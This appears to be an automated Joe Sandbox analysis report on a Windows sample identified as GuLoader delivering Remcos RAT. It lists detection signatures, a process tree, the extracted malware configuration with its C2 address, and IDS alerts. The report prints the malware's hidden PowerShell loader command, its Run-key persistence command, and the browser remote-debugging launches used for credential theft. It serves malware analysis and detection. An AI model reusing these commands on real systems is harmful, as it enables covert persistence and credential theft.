Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPO3799039985.exe

Overview

General Information

Sample name:rPO3799039985.exe
Analysis ID:1553438
MD5:efb9125831992267d27c5dd9a2bdc0be
SHA1:0be2e44632121c8fc2f325ed4af6b91e49486711
SHA256:7028c43edb1ed93fee2d535a938b07a687d01cf5a5e4dc9e9104d5fa372089ca
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • rPO3799039985.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\rPO3799039985.exe" MD5: EFB9125831992267D27C5DD9A2BDC0BE)
    • powershell.exe (PID: 2004 cmdline: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 5024 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 5600 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • reg.exe (PID: 8156 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • chrome.exe (PID: 7732 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
          • chrome.exe (PID: 5764 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • msiexec.exe (PID: 6196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2092 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msedge.exe (PID: 4008 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
          • msedge.exe (PID: 5092 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
  • msedge.exe (PID: 7440 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • msedge.exe (PID: 6672 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • identity_helper.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
    • identity_helper.exe (PID: 4576 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["87.120.114.20:53279:1"], "Assigned name": "P2-01", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HMKDWQ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 8 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO3799039985.exe", ParentImage: C:\Users\user\Desktop\rPO3799039985.exe, ParentProcessId: 6396, ParentProcessName: rPO3799039985.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), ProcessId: 2004, ProcessName: powershell.exe
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5024, ParentProcessName: msiexec.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7732, ProcessName: chrome.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Besmears
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5600, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ProcessId: 8156, ProcessName: reg.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.13.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5024, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49767
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5024, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)", ProcessId: 5600, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO3799039985.exe", ParentImage: C:\Users\user\Desktop\rPO3799039985.exe, ParentProcessId: 6396, ParentProcessName: rPO3799039985.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), ProcessId: 2004, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5024, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T08:10:55.239935+010020365941Malware Command and Control Activity Detected192.168.11.204976987.120.114.2053279TCP
              2024-11-11T08:10:56.661525+010020365941Malware Command and Control Activity Detected192.168.11.204977287.120.114.2053279TCP
              2024-11-11T08:10:56.677130+010020365941Malware Command and Control Activity Detected192.168.11.204977187.120.114.2053279TCP
              2024-11-11T08:10:56.692900+010020365941Malware Command and Control Activity Detected192.168.11.204977087.120.114.2053279TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T08:10:56.725745+010028033043Unknown Traffic192.168.11.2049773178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T08:10:50.401480+010028032702Potentially Bad Traffic192.168.11.2049767104.21.13.139443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.114.20:53279:1"], "Assigned name": "P2-01", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HMKDWQ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: rPO3799039985.exeVirustotal: Detection: 18%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: rPO3799039985.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.11.20:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.200.96:443 -> 192.168.11.20:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.126.29.12:443 -> 192.168.11.20:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.135.7:443 -> 192.168.11.20:49786 version: TLS 1.2
              Source: rPO3799039985.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbO source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb{ source: powershell.exe, 00000002.00000002.144031828230.0000000008A68000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
              Source: C:\Users\user\Desktop\rPO3799039985.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D5C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_214D5C00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D7E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_214D7E20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D73F0 FindFirstFileW,FindNextFileW,LdrInitializeThunk,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,4_2_214D73F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214E8AD0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_214E8AD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_21DE10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_21DE6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 7MB later: 27MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49771 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49770 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49769 -> 87.120.114.20:53279
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49772 -> 87.120.114.20:53279
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 87.120.114.20
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 87.120.114.20 ports 2,3,53279,5,7,9
              Source: global trafficTCP traffic: 192.168.11.20:49769 -> 87.120.114.20:53279
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.21.13.139 104.21.13.139
              Source: Joe Sandbox ViewIP Address: 172.67.200.96 172.67.200.96
              Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49773 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49767 -> 104.21.13.139:443
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.114.20
